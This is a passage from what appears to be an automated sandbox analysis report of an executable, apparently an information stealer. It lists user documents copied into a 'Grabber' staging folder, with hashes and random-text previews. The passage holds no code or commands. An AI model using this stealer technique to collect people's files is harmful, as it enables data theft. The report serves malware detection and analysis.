                                                                                                                                                            Preview:UBVUNTSCZJAGLEGJZLCTIUQFFTUXDGDMZJQSDGEUEZOCBPGJSTOXKFSFTPIFBIKUDFGJYNMGAHDLCCBOEEEUNDVTZSSGPULUJZCBRUSSRMTLDUGQOQKVROLRJDHOOHJXMEPMNZDGEBDTTAEAEJCKLRVWCOLIIJKXJVGJTDGTJTMJYRSSCFIUBQJSAAGFSLSZFDVWSBSLSFWVWAKIVRABMEABTSRVNHFAUBQVUKUGKOQLXKMVCHWOENBPZIRFFNIBJHBXJZOSTOJMCOMWJYXIRUTOLTBLVSGVAMTJXLCOKCNQALOCPGXTFQAUQFHGAFMBLBVZARLSUCFPEKPDNIIKVYFFALFRMJLPBOIYAEBYGDKMJWVNVCRRTIKWLRPMCWOUQYNZOVRXJZGIBNPUIZVGCFNRVDQJDBZFWNUPAIOVWPSTJPYIFRJEDQXOLNJKZEAKFGCQRFEAEDDTSLANTRTDUFPLZDAQZOEVHBNZBBOWVCJGOJGEENCESIPRLRHJPSJIDZFYFGWBOICBDBARPMJSJVKIRCJDUJTBZDQZSLZRQKLHJNARCATMJTIPRCDTICNCOVWFMTNAMXVKTRCGVRUZXEVVHOCRAMANXYNIATUBIPWGEUAHFOMUVYGSTOPSLYTHFQUZOVARZTTQMZZBFBISOCNEJQIQSHCEZDLCZJBWBPRTPVBULQLKPGBGVXXCAGMQMEWMWVFLTSOIUMKMOXXERANPKKZPXOUEIVBROTGGTVGPVNCXLBBDDBNPFYMAIQENYNXZZSQFDAUBTFLXQZBZOZJSXPYCMWYGTDJCCAJAFDJAKNRUMREQFHKKODROXTZNQKVVBMBOOWUVFRPNRVIHZNACJEUFOKBTDDOXQDLEZIOORSUQSNIXNUGQEZKRSOOHNEWSDAYASMDNIPWCATAIQUBESVNNUPBTFENKJJSJCRPLNTTZSXPLFTUDGBIUBNBEEDWADWKLFZRQSZCOUAERIXPFMGENDQBPODGLAHCD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\UBVUNTSCZJ.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:HIT archive data
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.680710927136183
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:VYQPeqnSuHRl1G4WOFR8oWZjan0aoAqQ0TSudRWA9qAGD0:VYQPXRl1FWOr89xN0qQwS2b40
                                                                                                                                                            MD5:C638B1D291F5DDC3F5007F5E51345CB1
                                                                                                                                                            SHA1:56AEE241589380F48AADB1A7EA88D0C68BE9FF9F
                                                                                                                                                            SHA-256:A6AE84E0618A8785E1B92D24489E69607A71DD3FC657FBD4EBACEA00B33A71B5
                                                                                                                                                            SHA-512:289AEE36191CE86D62B38B0253B42AEB732F66A58C57F990B48F45F21F280F355C52A3690129DC1CE5EA039D7A854C8AD63D8A8F3B83752031610332785DDF5B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:UBVUNTSCZJAGLEGJZLCTIUQFFTUXDGDMZJQSDGEUEZOCBPGJSTOXKFSFTPIFBIKUDFGJYNMGAHDLCCBOEEEUNDVTZSSGPULUJZCBRUSSRMTLDUGQOQKVROLRJDHOOHJXMEPMNZDGEBDTTAEAEJCKLRVWCOLIIJKXJVGJTDGTJTMJYRSSCFIUBQJSAAGFSLSZFDVWSBSLSFWVWAKIVRABMEABTSRVNHFAUBQVUKUGKOQLXKMVCHWOENBPZIRFFNIBJHBXJZOSTOJMCOMWJYXIRUTOLTBLVSGVAMTJXLCOKCNQALOCPGXTFQAUQFHGAFMBLBVZARLSUCFPEKPDNIIKVYFFALFRMJLPBOIYAEBYGDKMJWVNVCRRTIKWLRPMCWOUQYNZOVRXJZGIBNPUIZVGCFNRVDQJDBZFWNUPAIOVWPSTJPYIFRJEDQXOLNJKZEAKFGCQRFEAEDDTSLANTRTDUFPLZDAQZOEVHBNZBBOWVCJGOJGEENCESIPRLRHJPSJIDZFYFGWBOICBDBARPMJSJVKIRCJDUJTBZDQZSLZRQKLHJNARCATMJTIPRCDTICNCOVWFMTNAMXVKTRCGVRUZXEVVHOCRAMANXYNIATUBIPWGEUAHFOMUVYGSTOPSLYTHFQUZOVARZTTQMZZBFBISOCNEJQIQSHCEZDLCZJBWBPRTPVBULQLKPGBGVXXCAGMQMEWMWVFLTSOIUMKMOXXERANPKKZPXOUEIVBROTGGTVGPVNCXLBBDDBNPFYMAIQENYNXZZSQFDAUBTFLXQZBZOZJSXPYCMWYGTDJCCAJAFDJAKNRUMREQFHKKODROXTZNQKVVBMBOOWUVFRPNRVIHZNACJEUFOKBTDDOXQDLEZIOORSUQSNIXNUGQEZKRSOOHNEWSDAYASMDNIPWCATAIQUBESVNNUPBTFENKJJSJCRPLNTTZSXPLFTUDGBIUBNBEEDWADWKLFZRQSZCOUAERIXPFMGENDQBPODGLAHCD

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\VWDFPKGDUF.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696835919052288
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                                                                            MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                                                                            SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                                                                            SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                                                                            SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\VWDFPKGDUF\HQJBRDYKDE.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.691179545447335
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:tlYQ6oxCx5XYY3KvUEOIA65F7dAeIQGhrMerXo:rxy5avIgDIQQrMQXo
                                                                                                                                                            MD5:70ED9F89ADEE0C43C2C82F30F075991E
                                                                                                                                                            SHA1:0E75067F3EEBF7D577813A06A0A6A2FA9640A04F
                                                                                                                                                            SHA-256:4CCB14AF416B302962BC020D9E436FCA0B32B56F37932B2CA7D078355282CF80
                                                                                                                                                            SHA-512:A75A2B3BE722735CE45B93CB1522F31D884BA8BE30A122BFCE7E50720773B0B5B48F163BB9FF0239015430BEADD61DAD76F13EA6CC027C5A4AB4B842EED468CB
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:HQJBRDYKDEOHXEMHQUWMHZKQTIUMQUJZQSHSNBAZYZJDQYWUPMZFOTGKPEFSZCMKVLFONSCAAMYVGLIHZYOTOPUUVQOBDOLNPVUWURWNEXALCBEMRUAMWIVXUEMKBDPTQDMNCZDHIBPXPQNVVBSEAMAZGUFIOXJXUMQDPOKVVJUQBWZVZRBRPTZPVEJYLPIYMEAMWWDBNMSHJABGSBWULRADLUGOSJMUMMAMATXWORDUBFFRKPJOGISDLVVWVEVKTCLPSYFZVEZUCAYZDFGQESZIGEIJSPECVLABTLKSYGZSZGOCSOVUTVVPDTKMXTQIDAXVAJZEADSIEJVOWEHIMAOXMXIYKZIBMQKEOKXDOHFZWHLAGEWJECAZGRNZINNBMFSXKSHESCTAUQMEPBTLUPWEJFSFLHXHTECHZUUDFJOGDDWIRGOWPPKFZEUJYTJMHKZKHJNTGRKLLEAGPHTTOOTTMGEBMEHXZJPZXSVAQMYTVIDQEYRXIAPROXUHUUXYGMHCRUUYFQOWDUPJKUNGSADHWGBZUQMPTWLBUXNFUJGXUJHMMUUHZIKPUPRZVXNDGTJDDXIMANOVZFNWWEHJHXRQXSYDNXTPEXJZNKPPCJBVRMLFMRIEWFPGJGVBHZKCGUUQFRCXDGAPMAVRPRODGVOWMFUTKARIMTYBKFAHZMPYXRSLUFTYOWQDSLXVKMYYISNNZDBQEVANDLZJURRLNHZBMEVGPOIXUCEKJTTUZSEQSNPEEYVXCUAWHUWEFITOITMDHBLUWCIANEGYREWEOVBZRHQTHBYYPFCKKGLXQPBHRRMJUHMZXPSZSYQISKTCKOCWTTRZHBQSMTMNCYCQKIGYNDYWGUIVILQUURMKJKQBBDUZOINKPJRQEGWTTZOFXCCZXUCHKCWUSBTKAOSTDEHMZTFHPRMNWUWUKXNTZRKJRQLXXQCEGZPAHKOBVMNQQIYGWKFTHIVTFKISEBNGTEJIXPIRDTAGJZNJKNLM

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\VWDFPKGDUF\QFAPOWPAFG.pdf

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.690474000177721
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:2OgtZqoLtXCKESzKP+tziBUswJwLVk9zxY/tks7VMejXhggCon:cLtXZEmKPopswJEqxUkp82an
                                                                                                                                                            MD5:A01E6B89B2F69F2DA25CB28751A6261C
                                                                                                                                                            SHA1:48C11C0BECEB053F3DB16EC43135B20360E77E9B
                                                                                                                                                            SHA-256:0D0EB85E2964B5DDA19C78D11B536C72544AE51B09DBEC26E70C69ADDC7E9AA5
                                                                                                                                                            SHA-512:1E335E567B7F959E7524E532E257FBC0A21818BDCE0B909F83CBBCE8013FA61A8D665D7DED0982F87B29A5A786A0EE7129792A1B2D48DD205180569D9E919059
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:QFAPOWPAFGZUMXROWPODMNAMXJGGULHBVFMBDFCUTBDPEHPYKVYAURAEPYZMHPBECXOGPOKPNMKAIBYHBFNFVWPHHZFRFVAYYHSJZJTHAYESIKJCXVOVANTTAMQKCXEHJRYFSWGEELTALODIPFLWFILANHAGQENMCPNFLPAJIPRNZRAIETALHZECBIKVUBLJMHNYJXPSAMZZCVZQOHLATXYVRZQROYHFKLVOJLGRAGXLMXJHKHSSCTHDFNSLOUEZPTFGVVVGCDIXIBWQFIIFACZAYUUQZJRKZXJQPLVPFTJAMSPRDIBBPPFLUCOUPPQDSFKQXMEIFUXXAGKAWLWJPNBHZSGIAFFXPBLRMFNGMVBEWTTPFJEHMXLOZWQHEHGWBXCAMZISSZMPHUOREQDUTUEPDVLBWTFCJIFAGQOEHFIMLTDTDLYPEQZDZBBZYMKXTUKVCEROFCABVNAQXVLLCCNLEOGKLFPVSGMNNQZHFNCWNPGBCLLMTYKZMJSUDIPHSUQJQTOTICLSMQNHYJAQTVXMEZAEGNBGADHUJNJLQZSSGWRLYBWJEOTERXWRTICIVUFNKHRUSWRGABWPZDFTGSDASOKXSFUGVBUISDQNJUAOCSOANZFXTFQGDKEKGZJRMJMGTAJCTJEOCZCUZMUYKAKZZQYDRJXWZWMOXQQLWJMWAENIFMHJXMELOZTVHRLQZNWCBXKEBNUBDDOFYHNWIPPRWGDZCQLMHAOLYZIDJJXAASOVDNHNMDDCIWFPIOLQHWQCPUVUZUDVOKBMFLALCZEQWJAKTVUUDROHEKJKHQBLQZNVWSNNZFKMZLQPFYUYHNCDTCBVUUNKNZIORBFTFVKLHZTQAPWVKTTZFCTHJBBWQMZTFKADJIZZANUOLLRBSVTUCNIJWDQPYHEPWEUTFVNOACOFURIPTLDGJUOYFJRHAUIQREUKUSADZYOEDEDZRKKPKLFLFQIMMIKLOCTSOFOEZYVAGMCITCUWAOUT

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\VWDFPKGDUF\SNIPGPPREP.jpg

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.701796197804446
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:C1U2g6pCwYBq9+pGzEcrz023TZ9iFxwELi:2U2gCCm9drz0wTZsIEe
                                                                                                                                                            MD5:C8350CE91F4E8E8B04269B5F3C6148DA
                                                                                                                                                            SHA1:22D523A327EBAF8616488087E2DCE9DBD857F0CC
                                                                                                                                                            SHA-256:1BE0B3682C4F3A3315465E66A2C7C357BB06225947C526B1B89A39D9D120AFBF
                                                                                                                                                            SHA-512:C4891D35B6E895E4A9F4A785701EFFA4305AE88D09D309865F9312D95C296CB417916D8CBA461099E80F68C5AE5015A1172E60319256A453DE81445660F55806
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:SNIPGPPREPVDSXKMBCQXEQRWSYOYKDGHPXSNVTYLWVPMUIXPKXDRFHMINIQBFZTPTVMTSZAWIXFLHCKJNAWKCQYMBHUKFDOIJBXXLUNVNMKEDOTTPPDLIAGSTXKJKMHVVGIGUNGKPTPDUEUVMGZRIBRMBHLZOZZIBTDOCDOASXCIFRVGCSENFOEARIYUEACCMVFPUDRRUHYQQFJBAWDGKHRWDHTGYUXKSSVSTFCVQOQGTKOBOMZZTKVYFLAXTKJMTUDSETBGCOOKYGPLGPNAFICZERONWJHOMIWLGEWSSANDAVRYRUWZSRNZFYKTMSQXLZZGTQKXVQLDKQIHEDADRTKYMYNBVWROSFBYUXYULCESFAKNPBXYOELAWZCZFAPVQWMMNLBQRIPMVDMMWGXGKDJNUJGGGBNSGWEDDLRHGAAWJCYOEMVEHAYXYEHSKMWJPPHERNLXAGENBCUAZODRTUDIOUWNPZSHJGYOVHWQKWRAGGUMLCITTLAJXOXDUPFFLAHWLWPRQRAXSKOBHTXQNNGYHHVLBOEFTHAXTLKUGTNIYSDATIJHBUFTSGQHRXQQGXCBWVJIULNMYSMFYMPXRZOWMHYMZOLIBIYHPQRQJTZOMJZHKRTSWQQVINGIZHWDLNCJKAMKHSMFOTUPQMESXHXMJSAXESVNVSKORQSXVCYCKNZKOFZFUKINTRLLEGXVQTQURFVKWLFRQZVQVBVOEMATWFLXFDJVWCYMPYCSJCUUGUCIPOPIVLEFNZCPNYAWTXOATSTYLECDEFJNQFYGVPQWTJBNAVWKGALRTACLENBODJOQDXMPOYCYEFXOOOOMCQXLRGDBUUVJNQAEBZDSPDLPFIEOXRWSFCHXDUSBTSLEDLCZPOHIMIMQZMHHTMDFUUMKUAMBYNWWRQKDEXPPDWGKCNTWTFNHBMNDQIMVNFYWGALYORHHPUAXLDHMTGOKMMTAOCOVLGFIHZLZFADWMNNCWOLNJDSGFCWVDBYK

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\VWDFPKGDUF\VWDFPKGDUF.docx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.696835919052288
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:Fn9jgzow1W6XZpt5tv2wi/9nymo1rcjQV26NyDmb5HPZ:zjgEw1bpfTi1yfhcUV2by5HPZ
                                                                                                                                                            MD5:197C0DB71198B230CF6568A2AA40C23B
                                                                                                                                                            SHA1:BAE63DD78D567ED9183C0F8D72A191191745C4E5
                                                                                                                                                            SHA-256:6935BFDC854F927C6F05F97AE4865ECAA22F7D10D909725B7D67D87F17FF0F41
                                                                                                                                                            SHA-512:972C7D9B89EBADA01E3C2D21B391AFA317A8B587DE768875B3B7082761E17AF795BF72B49DEE71DC1F5363863EEF3C7E2966E6AE3D2E6F481E373A77163316C7
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:VWDFPKGDUFQFRUPAPPQGIIRLBMRJVLIMQXSWPKBCUGCSOYPXVZRYABCFRPGQFBKSRNNBPWCDTZQKOZTHEOXCUIMHAWUSAMNXIIEPWHBTSEWOJOEJUQZAZDGIRHLRLOCXDMGTXDXEJOWMXIFWDAGYCVGTBKYMXDYOTCGCARASSUUCMCNKFTCZOAQXBNILJTUOLCZYYUZFHGWFTCHDXYTZOEGFUAJLGZANLVNEVWHIIIRSURMEOTZWVHRLOGMTVRWICZIENOPRWLNSVHXQMULNZLBRICRJVVBJMJGVHJSCKBXVMICMFJQQTCIUSXRLUSMTSWGCQDGVFRQVIURPCVBLZIFEZKBUZGKUJIZAWRLYVVXWFGKCMRQFIVHFVXBDHBEKOJAILQRRTZPUTWBVRNRLZEMFWWBQUGOQWYUEGPKIVHQJHQHSJWVVENNMOAHFXILPEJPHZOQMAVSUXBQQEJFNFIKFQWEWEPKTIQQETBFSABZAOBVXEBARHKLVLMCAFGXXBLNGBZRJQOGMNGDAODYAVKYTFOYJRZDLZIYWZNRPPVZNHCTKOIHMETIQDHDGBHUSSZDLEXZSKRZLTIUMEADMONDOIPXWOAELAEUEJDZBECSINHBJNAYCCYTMEJUWYDNJDACYHUQIQZZBMKKRCJDQSGEHBSIIWWFOPRPYXHWNRLQFZPXUQSZHWHJGRVRNYZBBQUFKAWZTIDUQSFTJJPUAKBRGABJCNWDXOUPLCRZTCKKHIKTYZOGNWDCTUTSDFJLIDJMCLEXGJRUQRWREGZISCYJSMOFQXYMCGMMJMSQASADRKRHYGUYLIBJAAJOTHXHEVLCQEGGJBJBKULCPBXSIOOIEJPQIXDQHKAQSQMLWOISQZQTMTCLGTEHDXRHOIVIVQGKJJACQWPPTBGGHHKJRRPRENADLUPCMGIERRBDQYQJFUSIHVYGVGSIQZZWUZLCSUBMKCQYKCYTJRNNKEZZWFQMXWYFKKWAXFIFRJZTE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\VWDFPKGDUF\WSHEJMDVQC.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694142261581685
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                            MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                            SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                            SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                            SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\WSHEJMDVQC.xlsx

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.694142261581685
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:f9GDi2EYjkpBrLp83PYbuFr5oKIQppDgX+qrctnWyd3z+g8BHGZ:yEYjkpZYwS/oKIuA+qriTjEBHe
                                                                                                                                                            MD5:E9AA17F314E072EBB015265FB63E77C0
                                                                                                                                                            SHA1:1233B76350B8181FFFC438B62002C02B4AE79000
                                                                                                                                                            SHA-256:F66078FCFEC2D71549136CC8B5B4EE7D33C4994E0A4E3E7C11F5ADCD819D0436
                                                                                                                                                            SHA-512:719E659924CE585E4DD8CEA9BC6B5371AD810999022F874F380F50C7153D3AE97CC934E3173EF06573CAEE6CBC835A668C4D7DC2ADE597B1B0D200FCBAC67DA1
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:WSHEJMDVQCWJPIIWMEHEPOBRYLOZOHFMDEEYYASRZPHJZGFNCKWIQSPBUMWBCKDMTEBFINALYAFGJUQXINNGDKSDBFBQLHYZRLLDJYSVNXVIEPIYHZGOTARYUNPFNZVRVVWIOWWFIFWCHVVHXNGKFNRNLVVSOPOMGZCDQUWJFARKTCAVVDPTCPNIDLRGSLNKZTVRAJAILYGDVIAAGIVKXRCRTRZJPKATKZAWRJTPVLTDNBDIRDWCCHBTEVEGYPYDTGSMLUDQXMQCAVHLYMRKPCVHQHMGNCGBZKOUKCCBHQPSIYIJGDVOYJJJRQLDKNVUEXDKCTANSMCHJUBIODALXWUAFPSECIRPCAEPPBACCLXBZAEDKJHLGOICLSKBQEGFCVDQOFKKAJPCTRIXBNPUDXKHSSXTDTQZSFEWHTHKFNJWHOEXGCYSYWIHFSMYJIYEESDQFMESLFQFBUJNXHWFNXIDWEUDMVGFDXPTRRRNPARVUGZAYZRHNTXHZAPBLWMHFSSHMXCYMAGONQNLTCAVPZPCAKJRMGEPDIFETDNSXWPDVMAZGTTCLNRREMVTBLOGKASYOATUDXLJKIYPPDNLZIZMWWFFDVMUFCTZZOFJORNAMGQBAFGCPTDCZBKTIGYDSCSPMIEXAMGICZNTFVNRPLGPMBXJHNCQSYNMGGPKIQJNDBDUBVIVXFILKXZXHODXZAYIDEIMZZMKQNQNBCCMZNFBKSYULDGKOMQZDUQMUVTBBTUTRZMIOZGDEUPHCDKJQDSGBXYNWPWTHYVLGGYNOBJJKAZSTKJSBCHVCLGWYHCNILYSCYCHTGYOGMNGWDZAVDCOVKWJPWVNTTKFTSHAAXLYUEWEVGETFCFTLKWTQCVAMBWYOYJVXNPSSWXJXUZDXJOZNTBLIZLLJQXYNILILMHHONBPAPFMVWEMHIHAGMOXTIBNNEBGCVSZEZTMJVDXSVACSKTAVTFOOSEHZQGTOUSCIQBVIWZGABQNZGJE

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Documents\desktop.ini

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):402
                                                                                                                                                            Entropy (8bit):3.493087299556618
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:12:QZsiL5wmHOlDmo0qmUclLwr2FlDmo0IWF9klrgl2FlDmo0qjKAev:QCGwv4o0hlLwiF4o0UUsF4o01AM
                                                                                                                                                            MD5:ECF88F261853FE08D58E2E903220DA14
                                                                                                                                                            SHA1:F72807A9E081906654AE196605E681D5938A2E6C
                                                                                                                                                            SHA-256:CAFEC240D998E4B6E92AD1329CD417E8E9CBD73157488889FD93A542DE4A4844
                                                                                                                                                            SHA-512:82C1C3DD163FBF7111C7EF5043B009DAFC320C0C5E088DEC16C835352C5FFB7D03C5829F65A9FF1DC357BAE97E8D2F9C3FC1E531FE193E84811FB8C62888A36B
                                                                                                                                                            Malicious:false
                                                                                                                                                            Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.0.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.2.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.5.....

                                                                                                                                                            C:\Users\user\AppData\Local\1748642afea85b545bfef23bd04430d7\user@116938_en-US\Grabber\DRIVE-C\Users\user\Downloads\BQJUWOYRTO.png

                                                                                                                                                            Download File
                                                                                                                                                            Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                            File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                            Category:dropped
                                                                                                                                                            Size (bytes):1026
                                                                                                                                                            Entropy (8bit):4.68639364218091
                                                                                                                                                            Encrypted:false
                                                                                                                                                            SSDEEP:24:P4r5D4QctcBd3LMDzR8JwOlGpXSmDbvy5z5hu/KBdAmHtTQ:P49StmdbMfR8ApSmnvyXhuCBd3ts
